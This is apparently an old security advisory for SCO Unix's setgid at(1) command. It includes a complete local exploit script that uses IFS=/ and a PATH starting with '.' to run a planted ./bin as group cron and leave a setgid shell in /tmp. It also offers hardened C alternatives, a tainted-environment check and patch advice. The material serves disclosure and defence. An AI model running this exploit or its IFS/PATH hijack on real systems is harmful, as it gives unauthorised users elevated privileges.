COMMAND

    at(C)

SYSTEMS AFFECTED

    SCO Unix System V/386 Release 3.2 Versions 4.2, 4.1, and 4.0
    SCO Open Desktop Lite Release 3.0
    SCO Open Desktop Release 3.0 and 2.0
    SCO Open Server Network System Release 3.0
    SCO Open Server Enterprise System Release 3.0

PROBLEM

    at(1) can be used to execute arbitrary commands as group cron.

    at(1) was originally designed to run setuid root.  SCO's version of
    at runs setgid cron, but still handles privileges as if it were
    running with euid 0.  at(1) uses popen(3) to execute /bin/pwd.
    popen(3) hands the command to sh -c, and at(1) resets neither IFS
    nor PATH before doing so, which lets the caller subvert the
    /bin/pwd command: with IFS=/ the shell splits "/bin/pwd" into the
    words "bin" and "pwd", and with "." first on PATH it runs ./bin
    from the caller's directory, as group cron.

    1. Create the file atbug:

    ------------------------- cut here ---------------------------
    #!/bin/sh
    # IFS=/ makes the shell that popen(3) spawns inside at(1) split
    # "/bin/pwd" into the two words "bin" and "pwd"; "." first on PATH
    # makes it find our ./bin instead of anything in /bin.
    IFS=/
    export IFS
    PATH=.:$PATH
    export PATH
    # ./bin runs as group cron and leaves a setgid-cron shell in /tmp.
    # $$ is expanded by this outer shell (the here-document delimiter
    # is unquoted), so the name matches the one echoed below.
    cat > bin << EOF
    #!/bin/sh
    IFS=" " export IFS
    cp /bin/sh /tmp/sh.$$
    chgrp cron /tmp/sh.$$
    chmod 2755 /tmp/sh.$$
    EOF
    chmod 777 bin
    # Any at(1) invocation will do; the popen() inside at runs ./bin.
    at 1200 < /dev/null
    IFS=" " export IFS
    echo created /tmp/sh.$$
    exit 0
    ------------------------- cut here ---------------------------

    2. Execute the commands:

    % chmod 700 atbug
    % ./atbug
    warning: commands will be executed using /bin/sh
    job XXXXXXXXX.a at <whatever>
    created /tmp/sh.20558
    % /tmp/sh.20558
    $ id
    .... egid=16(cron) ....
    $
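
    The following is an added example, not SCO's at(1) source or the
    SCO patch.  It shows the popen(3) idiom the advisory describes next
    to two ways of obtaining the working directory that never let the
    caller's IFS or PATH reach a shell, plus a small check that flags
    an inherited IFS/PATH as suspicious.  All function names are this
    example's own; it assumes a POSIX system with /bin/pwd present.

```c
/*
 * Added example (not SCO's at(1) code): the vulnerable popen("/bin/pwd")
 * idiom beside hardened alternatives.  Names are this example's own.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Strip the trailing newline that /bin/pwd prints. */
static void chomp(char *s)
{
    size_t n = strlen(s);
    if (n > 0 && s[n - 1] == '\n')
        s[n - 1] = '\0';
}

/* Vulnerable idiom: popen() runs "sh -c /bin/pwd", and that shell
 * inherits whatever IFS and PATH the untrusted caller exported.  On an
 * old Bourne shell, IFS=/ and PATH=.:$PATH turn "/bin/pwd" into the
 * words "bin" and "pwd", so ./bin runs with the program's egid. */
int pwd_via_popen(char *buf, size_t len)
{
    FILE *fp = popen("/bin/pwd", "r");
    if (fp == NULL)
        return -1;
    if (fgets(buf, (int)len, fp) == NULL) {
        pclose(fp);
        return -1;
    }
    chomp(buf);
    return pclose(fp) == 0 ? 0 : -1;
}

/* Hardened: no shell, an absolute path, and an environment constructed
 * here, so nothing the caller put in IFS or PATH is ever consulted. */
int pwd_via_execve(char *buf, size_t len)
{
    static char *const argv[] = { "pwd", NULL };
    static char *const envp[] = { "PATH=/bin:/usr/bin", "IFS= \t\n", NULL };
    int fd[2], status;
    ssize_t n;
    pid_t pid;

    if (pipe(fd) == -1)
        return -1;
    pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {
        close(fd[0]);
        dup2(fd[1], STDOUT_FILENO);
        close(fd[1]);
        execve("/bin/pwd", argv, envp);
        _exit(127);                       /* exec failed */
    }
    close(fd[1]);
    n = read(fd[0], buf, len - 1);
    close(fd[0]);
    if (waitpid(pid, &status, 0) == -1 || n <= 0)
        return -1;
    buf[n] = '\0';
    chomp(buf);
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

/* Simplest fix of all: no child process at all. */
int pwd_via_getcwd(char *buf, size_t len)
{
    return getcwd(buf, len) != NULL ? 0 : -1;
}

/* Returns 1 when an inherited IFS or PATH looks attacker-controlled:
 * IFS other than the default whitespace set, or a PATH containing "."
 * or an empty entry.  A setgid program should reset both regardless;
 * this is what you would log to notice an attempt. */
int env_is_tainted(const char *ifs, const char *path)
{
    const char *p;
    if (ifs != NULL && strcmp(ifs, " \t\n") != 0)
        return 1;
    if (path == NULL)
        return 0;
    p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t seg = colon ? (size_t)(colon - p) : strlen(p);
        if (seg == 0 || (seg == 1 && p[0] == '.'))
            return 1;
        if (colon == NULL)
            break;
        p = colon + 1;
    }
    return 0;
}

/* 1 if the hardened helper and getcwd() agree on the directory. */
int hardened_pwd_matches_getcwd(void)
{
    char a[4096], b[4096];
    if (pwd_via_execve(a, sizeof a) != 0 || pwd_via_getcwd(b, sizeof b) != 0)
        return 0;
    return strcmp(a, b) == 0;
}

int main(void)
{
    char buf[4096];
    printf("inherited env tainted: %d\n",
           env_is_tainted(getenv("IFS"), getenv("PATH")));
    if (pwd_via_execve(buf, sizeof buf) == 0)
        printf("cwd: %s\n", buf);
    return 0;
}
```

    Note that a modern sh applies IFS only to the results of
    expansions, not to the -c string itself, so pwd_via_popen() will not
    reproduce the splitting on a current system; the PATH half of the
    problem, and the fix of not inheriting the environment, are
    unchanged.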

SOLUTION

    Obtain a patch from SCO.
    The patch is available at ftp.sco.COM:/SSE/sse001.*

    Until the patch is installed, consider restricting at(1) to trusted
    users through cron's at.allow/at.deny files, since the exposure is
    limited to users who can invoke at(1) at all.